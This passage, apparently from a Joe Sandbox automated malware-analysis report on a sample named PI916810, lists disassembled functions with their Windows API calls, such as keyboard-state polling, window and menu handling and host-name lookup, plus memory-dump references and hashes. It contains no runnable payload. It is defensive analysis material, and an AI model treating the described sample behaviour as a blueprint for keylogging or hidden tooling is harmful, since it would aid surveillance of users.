                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                                                                                                            • String ID: 0.0.0.0
                                                                                                                                                                            • API String ID: 208665112-3771769585
                                                                                                                                                                            • Opcode ID: 927e3251ccc5e0569fdb93411cbb41e5984aa7548bfdce662e11a2a2e64ac889
                                                                                                                                                                            • Instruction ID: 013cd5c9900a49fae6e48e416bd3b2ea108ff87fc535330ac2cf66e46ee8bc94
                                                                                                                                                                            • Opcode Fuzzy Hash: 927e3251ccc5e0569fdb93411cbb41e5984aa7548bfdce662e11a2a2e64ac889
                                                                                                                                                                            • Instruction Fuzzy Hash: 30113575904124ABCB20BB309D46FDF77ACEB80310F0002BFF90496192EFB89A859759
                                                                                                                                                                            Function 004C5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • timeGetTime.WINMM ref: 004C521C
                                                                                                                                                                              • Part of subcall function 00480719: timeGetTime.WINMM(?,75A8B400,00470FF9), ref: 0048071D
                                                                                                                                                                            • Sleep.KERNEL32(0000000A), ref: 004C5248
                                                                                                                                                                            • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 004C526C
                                                                                                                                                                            • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 004C528E
                                                                                                                                                                            • SetActiveWindow.USER32 ref: 004C52AD
                                                                                                                                                                            • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 004C52BB
                                                                                                                                                                            • SendMessageW.USER32(00000010,00000000,00000000), ref: 004C52DA
                                                                                                                                                                            • Sleep.KERNEL32(000000FA), ref: 004C52E5
                                                                                                                                                                            • IsWindow.USER32 ref: 004C52F1
                                                                                                                                                                            • EndDialog.USER32(00000000), ref: 004C5302
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                            • String ID: BUTTON
                                                                                                                                                                            • API String ID: 1194449130-3405671355
                                                                                                                                                                            • Opcode ID: 43d1a664f22ea0fe3e628e4d75c2dbcc0fcba95f6af60a03f6468d90011c8ae3
                                                                                                                                                                            • Instruction ID: d375233942376d377c2d46a0af6fd708c67a2fefd8d21457694e68338bd9169c
                                                                                                                                                                            • Opcode Fuzzy Hash: 43d1a664f22ea0fe3e628e4d75c2dbcc0fcba95f6af60a03f6468d90011c8ae3
                                                                                                                                                                            • Instruction Fuzzy Hash: 4921AA78204748AFE7505F30EDC8F2A7BA9EF6A346F00047DF401851B2DB756D8A9B29
                                                                                                                                                                            Function 004CD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 004CD855
                                                                                                                                                                            • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 004CD8E8
                                                                                                                                                                            • SHGetDesktopFolder.SHELL32(?), ref: 004CD8FC
                                                                                                                                                                            • CoCreateInstance.OLE32(004F2D7C,00000000,00000001,0051A89C,?), ref: 004CD948
                                                                                                                                                                            • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 004CD9B7
                                                                                                                                                                            • CoTaskMemFree.OLE32(?,?), ref: 004CDA0F
                                                                                                                                                                            • _memset.LIBCMT ref: 004CDA4C
                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 004CDA88
                                                                                                                                                                            • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 004CDAAB
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 004CDAB2
                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 004CDAE9
                                                                                                                                                                            • CoUninitialize.OLE32(00000001,00000000), ref: 004CDAEB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1246142700-0
                                                                                                                                                                            • Opcode ID: 8b930d9319dcb5639063b3dd7686bbccfe0675673abcd4e24d4d1d9d90816d92
                                                                                                                                                                            • Instruction ID: 66c3dcacde736175d9a1e754be150f271ea30cd86836d0791e30ae2690f3badb
                                                                                                                                                                            • Opcode Fuzzy Hash: 8b930d9319dcb5639063b3dd7686bbccfe0675673abcd4e24d4d1d9d90816d92
                                                                                                                                                                            • Instruction Fuzzy Hash: 13B11A75A00109AFDB04DFA5C888EAEBBB9FF48304B04846EF509EB261DB34ED45CB55
                                                                                                                                                                            Function 004C052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 004C05A7
                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 004C0612
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A0), ref: 004C0632
                                                                                                                                                                            • GetKeyState.USER32(000000A0), ref: 004C0649
                                                                                                                                                                            • GetAsyncKeyState.USER32(000000A1), ref: 004C0678
                                                                                                                                                                            • GetKeyState.USER32(000000A1), ref: 004C0689
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000011), ref: 004C06B5
                                                                                                                                                                            • GetKeyState.USER32(00000011), ref: 004C06C3
                                                                                                                                                                            • GetAsyncKeyState.USER32(00000012), ref: 004C06EC
                                                                                                                                                                            • GetKeyState.USER32(00000012), ref: 004C06FA
                                                                                                                                                                            • GetAsyncKeyState.USER32(0000005B), ref: 004C0723
                                                                                                                                                                            • GetKeyState.USER32(0000005B), ref: 004C0731
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: State$Async$Keyboard
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541375521-0
                                                                                                                                                                            • Opcode ID: 0e7e6bbd9e4d15a644a9b7d57304a449171cede95d84cdb832c1819badac509c
                                                                                                                                                                            • Instruction ID: a30d73d86c76343613737ca11cdc9c0d11dff4d723fa05dc13dc7533b27fd002
                                                                                                                                                                            • Opcode Fuzzy Hash: 0e7e6bbd9e4d15a644a9b7d57304a449171cede95d84cdb832c1819badac509c
                                                                                                                                                                            • Instruction Fuzzy Hash: DB51CC28A047846AFB75DBA08454FEBAFB49F12340F08459F95C15A2C3DA5C9B4CCB69
                                                                                                                                                                            Function 004BC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDlgItem.USER32(?,00000001), ref: 004BC746
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004BC758
                                                                                                                                                                            • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 004BC7B6
                                                                                                                                                                            • GetDlgItem.USER32(?,00000002), ref: 004BC7C1
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004BC7D3
                                                                                                                                                                            • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 004BC827
                                                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004BC835
                                                                                                                                                                            • GetWindowRect.USER32(00000000,?), ref: 004BC846
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 004BC889
                                                                                                                                                                            • GetDlgItem.USER32(?,000003EA), ref: 004BC897
                                                                                                                                                                            • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 004BC8B4
                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 004BC8C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3096461208-0
                                                                                                                                                                            • Opcode ID: e389d741a798c178f90f525bc21e494a2bdfd2159f194c61d80c9db5a2cd56d3
                                                                                                                                                                            • Instruction ID: 62e8455b905265e42b7f1b5f44881aa3e7c0ac91636732f5847836c56c3b47c6
                                                                                                                                                                            • Opcode Fuzzy Hash: e389d741a798c178f90f525bc21e494a2bdfd2159f194c61d80c9db5a2cd56d3
                                                                                                                                                                            • Instruction Fuzzy Hash: B4514E71B00205ABDB18CFB9DDC9AAEBBBAEB88311F14813DF515D6291D7709D048B54
                                                                                                                                                                            Function 0046201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00461B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00462036,?,00000000,?,?,?,?,004616CB,00000000,?), ref: 00461B9A
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 004620D3
                                                                                                                                                                            • KillTimer.USER32(-00000001,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0046216E
                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 0049BEF6
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0049BF27
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0049BF3E
                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,004616CB,00000000,?,?,00461AE2,?,?), ref: 0049BF5A
                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 0049BF6C
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 641708696-0
                                                                                                                                                                            • Opcode ID: eb9bf25f5823cb72069002bf2d9d1d79f7aa5b2d8decf61b561a22f662d7a0f5
                                                                                                                                                                            • Instruction ID: 7018638f73c548710e08e5335be0272dd4550a262ab6fbe5b8ec1165968db121
                                                                                                                                                                            • Opcode Fuzzy Hash: eb9bf25f5823cb72069002bf2d9d1d79f7aa5b2d8decf61b561a22f662d7a0f5
                                                                                                                                                                            • Instruction Fuzzy Hash: 8861D130104A50EFCB359F14EE48B267BF1FF51306F14443EE5428AA65D7B9A886DF8A
                                                                                                                                                                            Function 004621A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004625DB: GetWindowLongW.USER32(?,000000EB), ref: 004625EC
                                                                                                                                                                            • GetSysColor.USER32(0000000F), ref: 004621D3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ColorLongWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 259745315-0
                                                                                                                                                                            • Opcode ID: 6ad2d3c9fcc9ad9a09edb1f50fd21414028bd3c25f1fd66b1845fcae755b24e3
                                                                                                                                                                            • Instruction ID: ad0f8fbefc05282e79103347f71faa7266aa082a6205b673d1dc5bd0d4dbe6b8
                                                                                                                                                                            • Opcode Fuzzy Hash: 6ad2d3c9fcc9ad9a09edb1f50fd21414028bd3c25f1fd66b1845fcae755b24e3
                                                                                                                                                                            • Instruction Fuzzy Hash: 0B41E330000580BFDB215F68DC98BBA3B65EB06331F1482B6FD618E2E2D7758D42DB1A
                                                                                                                                                                            Function 004CAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?,004EF910), ref: 004CAB76
                                                                                                                                                                            • GetDriveTypeW.KERNEL32(00000061,0051A620,00000061), ref: 004CAC40
                                                                                                                                                                            • _wcscpy.LIBCMT ref: 004CAC6A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharDriveLowerType_wcscpy
                                                                                                                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                            • API String ID: 2820617543-1000479233
                                                                                                                                                                            • Opcode ID: 348fed182d804be371a8bece339622fad5576bac366098883b3502fb5bfd1bf9
                                                                                                                                                                            • Instruction ID: ab1d97fa79abc471a28def0b0ad65297bf65b28ee954f792fa2fb1fc0af44cd7
                                                                                                                                                                            • Opcode Fuzzy Hash: 348fed182d804be371a8bece339622fad5576bac366098883b3502fb5bfd1bf9
                                                                                                                                                                            • Instruction Fuzzy Hash: A051A0341183059BC750EF15C881EAEB7E6FF80308F14482EF586572A2EB39AD59CB57
                                                                                                                                                                            Function 004EC27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                              • Part of subcall function 00462344: GetCursorPos.USER32(?), ref: 00462357
                                                                                                                                                                              • Part of subcall function 00462344: ScreenToClient.USER32(005267B0,?), ref: 00462374
                                                                                                                                                                              • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000001), ref: 00462399
                                                                                                                                                                              • Part of subcall function 00462344: GetAsyncKeyState.USER32(00000002), ref: 004623A7
                                                                                                                                                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 004EC2E4
                                                                                                                                                                            • ImageList_EndDrag.COMCTL32 ref: 004EC2EA
                                                                                                                                                                            • ReleaseCapture.USER32 ref: 004EC2F0
                                                                                                                                                                            • SetWindowTextW.USER32(?,00000000), ref: 004EC39A
                                                                                                                                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 004EC3AD
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 004EC48F
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                                                                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID$prR$prR
                                                                                                                                                                            • API String ID: 1924731296-167123084
                                                                                                                                                                            • Opcode ID: bca737c4bfe730ee9a36eb1632f873a3fa5893b0a333396599bd18b3ad3d45b9
                                                                                                                                                                            • Instruction ID: d8d6efbbfea217f3c0f888badb6a5f8b7030c14b06a846dd04f7f43dfd1eaffc
                                                                                                                                                                            • Opcode Fuzzy Hash: bca737c4bfe730ee9a36eb1632f873a3fa5893b0a333396599bd18b3ad3d45b9
                                                                                                                                                                            • Instruction Fuzzy Hash: AD51BC30204384AFD710EF21C895F6A3BE5FF88314F00492EF9958B2E2DB74A949CB56
                                                                                                                                                                            Function 00469997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __i64tow__itow__swprintf
                                                                                                                                                                            • String ID: %.15g$0x%p$False$True
                                                                                                                                                                            • API String ID: 421087845-2263619337
                                                                                                                                                                            • Opcode ID: 19eea700259d39563bbaa9baa0f4ec99fed09a4e93897bbdfae439024e59176d
                                                                                                                                                                            • Instruction ID: b137b6b6c7f02505ea00cb3ee92891f280a5b24fc49de00228c9de6bf03d2ee3
                                                                                                                                                                            • Opcode Fuzzy Hash: 19eea700259d39563bbaa9baa0f4ec99fed09a4e93897bbdfae439024e59176d
                                                                                                                                                                            • Instruction Fuzzy Hash: 424105B1504205AADF24AF39D841E7B77E8EB04304F20486FE649D7391EAB99C46CB1A
                                                                                                                                                                            Function 004E73C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004E73D9
                                                                                                                                                                            • CreateMenu.USER32 ref: 004E73F4
                                                                                                                                                                            • SetMenu.USER32(?,00000000), ref: 004E7403
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004E7490
                                                                                                                                                                            • IsMenu.USER32(?), ref: 004E74A6
                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004E74B0
                                                                                                                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004E74DD
                                                                                                                                                                            • DrawMenuBar.USER32 ref: 004E74E5
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                            • String ID: 0$F
                                                                                                                                                                            • API String ID: 176399719-3044882817
                                                                                                                                                                            • Opcode ID: 967b3362f801221899b5081d005a1a12c555213aad42d76d52312d8ec4bbefb1
                                                                                                                                                                            • Instruction ID: 278271e067728a30a65e7e51b98e423780917827cac49eee3005c3cd60dba181
                                                                                                                                                                            • Opcode Fuzzy Hash: 967b3362f801221899b5081d005a1a12c555213aad42d76d52312d8ec4bbefb1
                                                                                                                                                                            • Instruction Fuzzy Hash: A6417974A00285EFDB20DF65D884E9ABBF5FF49311F14402AF905973A1DB34A914DF58
                                                                                                                                                                            Function 004E772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 004E77CD
                                                                                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 004E77D4
                                                                                                                                                                            • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 004E77E7
                                                                                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 004E77EF
                                                                                                                                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 004E77FA
                                                                                                                                                                            • DeleteDC.GDI32(00000000), ref: 004E7803
                                                                                                                                                                            • GetWindowLongW.USER32(?,000000EC), ref: 004E780D
                                                                                                                                                                            • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 004E7821
                                                                                                                                                                            • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 004E782D
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                                                                                                            • String ID: static
                                                                                                                                                                            • API String ID: 2559357485-2160076837
